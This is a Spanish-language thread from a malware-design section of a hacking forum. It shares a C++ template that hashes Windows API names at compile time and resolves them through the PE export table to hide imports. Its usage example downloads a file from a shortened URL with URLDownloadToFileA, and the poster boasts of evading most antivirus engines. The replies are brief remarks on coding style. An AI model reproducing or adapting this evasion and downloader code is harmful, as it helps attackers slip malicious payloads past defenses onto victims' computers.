Foro de elhacker.net

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: Karcrack en 24 Enero 2013, 18:28 pm



Título: [C++ Template] Hasheado de APIs en compile-time - Invoke
Publicado por: Karcrack en 24 Enero 2013, 18:28 pm
Código
  1. #ifndef CRYPTAPI
  2. #define CRYPTAPI
  3.  
  4. struct FNV1a{
  5.    template <size_t N>
  6.    __forceinline static DWORD hash(const char (&str)[N]){
  7.        return (hash<N-1>((const char(&)[N-1])str)^str[N-1]) * 16777619u;
  8.    };
  9.  
  10.    template <>
  11.    __forceinline static DWORD hash<1>(const char (&str)[1]){
  12.        return (2166136261u^str[0]) * 16777619u;
  13.    };
  14.  
  15.    __forceinline static DWORD hash(char* str){
  16.        DWORD r = 2166136261u;
  17.  
  18.        do{
  19.            r ^= *str;
  20.            r *= 16777619u;
  21.        }while(*str++);
  22.  
  23.        return r;
  24.    };
  25. };
  26.  
  27. struct CUSTOM{
  28.    template <size_t N>
  29.    __forceinline static DWORD hash(const char (&str)[N]){
  30.        return ((hash<N-1>((const char(&)[N-1])str) ^ (str[N-1] << 24)) >> 2);
  31.    };
  32.  
  33.    template <>
  34.    __forceinline static DWORD hash<1>(const char (&str)[1]){
  35.        return (str[0]<<24)>>2;
  36.    };
  37.  
  38.    __forceinline static DWORD hash(char* str){
  39.        DWORD r = 0;
  40.  
  41.        do{
  42.            r ^= (*str << 24);
  43.            r >>= 2;
  44.        }while(*str++);
  45.  
  46.        return r;
  47.    };
  48. };
  49.  
  50. template <class ret, class hashFnc = FNV1a> class invoke{
  51. private:
  52.    char*   base;
  53.    DWORD   FuncHash;
  54. public:
  55.    template <size_t N, size_t M>
  56.    invoke(const char (&DLL)[N], const char (&Func)[M]){
  57.        base = (char*)LoadLibraryA(DLL);
  58.        FuncHash = hashFnc::hash<M>(Func);
  59.    };
  60.  
  61.    ret operator()(int numArgs, ...){
  62.        BYTE*                       dirApi;
  63.        IMAGE_DOS_HEADER*           IDH         = (IMAGE_DOS_HEADER*)base;
  64.        IMAGE_NT_HEADERS*           INH         = (IMAGE_NT_HEADERS*)(base + IDH->e_lfanew);
  65.        IMAGE_OPTIONAL_HEADER*      IOH         = &INH->OptionalHeader;
  66.        IMAGE_DATA_DIRECTORY*       IDE         = (IMAGE_DATA_DIRECTORY*)(&IOH->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);
  67.        IMAGE_EXPORT_DIRECTORY*     IED         = (IMAGE_EXPORT_DIRECTORY *)(base + IDE->VirtualAddress);
  68.  
  69.        void**                      FTABLE      = (void **)(base + IED->AddressOfFunctions);
  70.        WORD*                       OTABLE      = (WORD *)(base + IED->AddressOfNameOrdinals);
  71.        char**                      NTABLE      = (char **)(base + IED->AddressOfNames);
  72.  
  73.        for (DWORD i = 0; i <= IED->NumberOfNames; i++){
  74.            if (hashFnc::hash(base + (DWORD)NTABLE[i]) == FuncHash){
  75.                dirApi = (BYTE*)(base + (DWORD)FTABLE[OTABLE[i]]);
  76.                break;
  77.            }
  78.        }
  79.        va_list listaArgs;
  80.        void**  args;
  81.  
  82.        va_start(listaArgs, numArgs);
  83.        args = &va_arg(listaArgs, void*);
  84.  
  85.        for(int n=numArgs-1; n>=0; n--){
  86.            void* temp = args[n];
  87.            __asm
  88.                push [temp]
  89.        }
  90.        va_end(listaArgs);
  91.  
  92.        __asm
  93.            call dirApi
  94.    };
  95. };
  96. #endif

Forma de realizar la llamada:
Código:
invoke<%TIPO_DE_RETORNO%,%ALGORITMO_USADO%>(%NOMBRE_DLL%,%NOMBRE_FUNCION%)(%N_PARAMETROS%,%PARAMETRO1%,%PARAMETRO2%,...,%PARAMETRON%);

Ejemplo de uso:
Código
  1. #pragma comment(linker,"/ENTRY:main")
  2.  
  3. #include <Windows.h>
  4. #include "cryptAPI.hpp"
  5.  
  6. void main(){
  7.    invoke<void, FNV1a>("URLMON", "URLDownloadToFileA")(5, 0, "http://goo.gl/veps2", "C:/test.png", 0, 0);
  8.    invoke<BOOL, FNV1a>("KERNEL32", "ExitProcess")(1, 0);
  9. }
2/44 AV lo detectan... Nada mal teniendo en cuenta que ni URLMON ni http:// va ofuscado/cifrado.


Thread original:
Código:
http://foro.h-sec.org/programacion/(template)-cryptapi-cifra-la-llamada-a-las-apis-d


Título: Re: [C++ Template] Hasheado de APIs en compile-time - Invoke
Publicado por: Arkangel_0x7C5 en 24 Enero 2013, 20:43 pm
Buen código, aunque yo sigo prefiriendo usar punteros a funciones previamente declarados.

Mas que otra cosa porque es un poco engorroso la manera d hacer la llamada.

Saludos


Título: Re: [C++ Template] Hasheado de APIs en compile-time - Invoke
Publicado por: Karcrack en 24 Enero 2013, 21:24 pm
Para pocas funciones yo también prefiero usar typedefs y trabajar con los punteros.... Y mira mi último post en h-Sec :-*


Título: Re: [C++ Template] Hasheado de APIs en compile-time - Invoke
Publicado por: Shell Root en 24 Enero 2013, 22:08 pm
Y mira mi último post en h-Sec :-*
spam?  :silbar:


Título: Re: [C++ Template] Hasheado de APIs en compile-time - Invoke
Publicado por: Karcrack en 24 Enero 2013, 22:13 pm
@Shell Root: Más bien sería no abrir el chat para hablar con Ark :laugh: